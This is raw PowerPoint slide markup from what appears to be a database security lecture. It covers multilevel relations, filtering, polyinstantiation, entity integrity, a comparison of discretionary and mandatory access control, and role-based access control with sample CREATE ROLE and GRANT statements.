            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/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Each attribute A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is associated with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classification attribute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C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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In some models,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tuple classification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attribute TC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is added. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The value of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TC attribute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in each tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> t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– which is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highest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of all attribute classification values within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"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– provides a general classification for the tuple itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a: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multilevel relation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schema R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-6096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	R(A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C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A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C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…, A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" baseline="-25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TC)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dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	where each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" baseline="-25000" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" baseline="-25000" dirty="0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represents the classification attribute associated with attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman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apparent key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of a </a:t>
            </a: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multilevel relation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is the set of attributes that would have formed the primary key in a regular (single-level) relation.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19350" y="5268913"/>
          <a:ext cx="4133850" cy="111760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Fair     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Brown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80000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Good  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315325" y="6386513"/>
            <a:ext cx="742950" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{40EE3233-2A44-4899-8067-D3716A30E272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>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Filtering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06475"/>
            <a:ext cx="8478837" cy="2117725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A multilevel relation will appear to contain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different data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to subjects (users) with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different clearance levels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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It is possible to store a single tuple at a higher classification level and produce the corresponding tuples at a lower-level classification through a process known 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filtering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60012"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2604294" y="3259251"/>
          <a:ext cx="4133850" cy="111760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Fair      S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Brown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80000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Good   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23953"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="352425" y="4928508"/>
          <a:ext cx="4159250" cy="111760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NULL  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Brown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NULL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Good    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08991"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4671219" y="4923631"/>
          <a:ext cx="4133850" cy="757918"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="101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NULL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NULL   U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U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74" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5327196" y="4444150"/>
            <a:ext cx="268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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Classification U users see</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline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3075" name="文字方塊 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="997404" y="4444150"/>
            <a:ext cx="268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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Classification C users see</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="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3076" name="文字方塊 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3011602" y="2846726"/>
            <a:ext cx="3702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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The original EMPLOYEE tuples</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="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5149F9-0D7F-4357-8D37-D242218AE28A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766762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Database Security Issues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74725"/>
            <a:ext cx="8105775" cy="3773444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Legal and ethical issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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right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access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certain information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Policy issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>govermental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, institutional, or corporate level as to what kinds of information should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not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 be made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publicly available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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System-related issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Which various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security functions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should be enforced on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18A341-619A-4540-A99F-F39B2C5E9A5B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7463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Polyinstantiation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781050"/>
            <a:ext cx="8478837" cy="2105025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sometimes, it is necessary to store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two or more tuples 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at different classification levels with the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same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 value for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>apparent key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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This leads to the concept of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>polyinstantiation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 where several tuples can have the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same apparent key value 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but have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different attribute values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> for users at different classification levels.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17725" y="4800600"/>
          <a:ext cx="4159250" cy="149225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Fair          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Excellent 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Brown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80000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Good</a:t>
                      </a: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17725" y="3432175"/>
          <a:ext cx="4135438" cy="111760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Name</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="zh-TW" alt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Salary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JobPerformance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TC</a:t>
                      </a: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C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Smith U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40000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Fair      S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Brown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80000 S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Good   C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Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>S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86" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2428875" y="3040063"/>
            <a:ext cx="3778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The original EMPLOYEE tuples</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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44087" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2416175" y="6299200"/>
            <a:ext cx="3790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Polyinstantiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b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 of the Smith tuple</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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44088" name="向右箭號 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1651000" y="5691188"/>
            <a:ext cx="301625" cy="141287"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50228"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0028A8"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="290CD6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10" name="向右箭號 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1644009" y="5298303"/>
            <a:ext cx="301625" cy="141287"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50228"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0028A8"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="290CD6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F2AF84-374A-4304-97AE-CE3B036E0747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>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Entity Integrity Constraint in Multilevel Relation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969963"/>
            <a:ext cx="8401050" cy="3362325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>entity integrity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 rule for multilevel relations states that </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. All attributes that are members of the apparent key must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not be null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and must have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i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same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security classification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within each individual tuple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. All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other attribute values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 in the tuple must have a security classification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b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greater than or equal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to that of the apparent key. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45061" name="群組 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1090613" y="4545013"/>
            <a:ext cx="6156429" cy="584775"/>
            <a:chOff x="1090613" y="4886325"/>
            <a:chExt cx="6156429" cy="584775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45062" name="矩形 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1090613" y="4886325"/>
              <a:ext cx="615642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R(A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1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1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2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2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A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3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C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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3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…, A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" i="1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n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C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" i="1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n</a:t>
              </a:r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, TC)</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="45063" name="直線接點 6"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1519718" y="5441950"/>
              <a:ext cx="2052000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line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</p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文字方塊 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090613" y="5392450"/>
            <a:ext cx="508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where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i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 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i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C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1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i</a:t>
            </a:r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,  3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i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sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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E3BF87-FA52-4769-9FAC-B6A4F8F7CFDD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>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3.1 Comparing Discretionary Access Control and Mandatory Access Control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212850"/>
            <a:ext cx="8488362" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/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Discretionary Access Control (DAC) policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1"/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Advantage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high degree of flexibility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, which makes them suitable for a large variety of application domains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1"/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Disadvantage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: their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vulnerability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 to malicious attacks, such as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Trojan horses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embedded in application programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/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Mandatory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Access Control (MAC) policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1"/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Advantage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high degree of protection,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which prevents any illegal flow of information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1"/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Disadvantage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being too rigid;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only applicable in limited environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In many practical situations, discretionary policies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preferred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because they offer a better trade-off between security and applicability.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743" y="5412625"/>
            <a:ext cx="2244883" cy="8497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08" y="5443913"/>
            <a:ext cx="3165651" cy="8184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25" y="6353278"/>
            <a:ext cx="1824943" cy="1641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161" y="6342657"/>
            <a:ext cx="1711553" cy="1617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67725" y="6386513"/>
            <a:ext cx="590550" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EBADC0E1-4FFC-433E-9849-0EA8C33FD0BC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22238"/>
            <a:ext cx="8774112" cy="793750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3.2 Role-Based Access Control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15988"/>
            <a:ext cx="8497887" cy="4498975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct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Role-based access control (RBAC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0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emerged rapidly in the 1990s as a proven technology for managing and enforcing security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large-scale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enterprisewide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 systems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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Privileges are associated with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roles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,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users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are assigned to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roles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,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sales account</a:t>
            </a:r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sz="2000" b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>manager</a:t>
            </a:r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sz="2000" b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>purchasing agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"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sz="2000" b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>department manager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, and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Roles can be created using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CREATE ROLE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DESTROY ROLE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 commands. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The GRANT and REVOKE commands can then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to assign and revoke privileges from roles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.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="638714" y="5292725"/>
            <a:ext cx="4550309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CREATE ROLE manager;</a:t>
            </a:r>
          </a:p>
          <a:p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GRANT ROLE manager TO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" baseline="0" dirty="0" err="1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hsucc</a:t>
            </a:r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;</a:t>
            </a:r>
          </a:p>
          <a:p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GRANT ROLE sales-account TO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" baseline="0" dirty="0" err="1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leeys</a:t>
            </a:r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rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體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397348" y="5297409"/>
            <a:ext cx="3180208" cy="1112806"/>
            <a:chOff x="5397348" y="5297409"/>
            <a:chExt cx="3180208" cy="1112806"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47111" name="矩形 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6703682" y="5321190"/>
              <a:ext cx="6235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charset="-120"/>
                </a:rPr>
                <a:t>ROLE</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="160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2" name="矩形 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7544003" y="5321190"/>
              <a:ext cx="10335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charset="-120"/>
                </a:rPr>
                <a:t>ACCOUNT</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="16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3" name="橢圓 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6796193" y="5659865"/>
              <a:ext cx="140721" cy="45735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4" name="橢圓 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6936914" y="5610801"/>
              <a:ext cx="221135" cy="189598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5" name="橢圓 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6948642" y="5895198"/>
              <a:ext cx="149100" cy="18959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6" name="橢圓 10"/>
